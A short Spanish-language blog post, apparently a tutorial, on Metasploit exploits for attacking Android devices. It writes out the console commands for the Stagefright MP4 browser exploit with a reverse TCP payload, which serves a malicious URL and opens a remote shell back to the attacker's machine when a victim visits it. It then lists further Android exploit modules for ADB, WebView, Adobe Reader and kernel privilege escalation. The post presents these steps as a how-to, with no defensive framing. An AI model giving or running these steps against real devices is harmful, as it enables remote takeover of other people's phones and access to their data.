Hola amigos:
Hoy vamos a conocer los exploits que
trae metasploit (en el momento de escribir estas líneas) para
explotar android.
Uno de ellos es
stagefright_mp4_tx3g_64_bit:
use
exploit/android/browser/stagefright_mp4_tx3g_64_bit
set SRVHOST 192.168.1.131
set URIPATH /
set PAYLOAD
linux/armle/mettle/reverse_tcp
set LHOST 192.168.1.131
exploit
Montará un servidor en el puerto
indicado (como no lo hemos cambiado, el puerto 8080). Aunque sí es
para varios móviles, no es para todos. Cuando la víctima ingresa a
esa url maliciosa, explota una vulnerabilidad en la librería
stagefright, mediante un archivo mp4.
Otros exploit son:
- exploit/android/adb_server_exec: Explota un dispositivo android que está escuchando mensajes de depuración adb (adb nos permite interactuar entre un android y un pc).
- webview_addjavascriptinterface: Para la versión 4.1.2. Un código javascript no confiable puede ejecutar comandos arbitrarios.
- adobe_reader_pdf_js_interface: Explota una vulnerabilidad de Acrobat Reader en versiones menores a 11.2.0 que crea un pdf infectado.
- frutex_requeue: Explota una vulnerabilidad en frutex_requeue en el kernel de linux. Todos los núcleos anteriores a Junio del 2014 están expuestos. Es necesaria una sesión previa de meterpreter.
- put_user_vroot: Permite a un usuarios sin privilegios leer y escribir en la memoria del kernel.
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.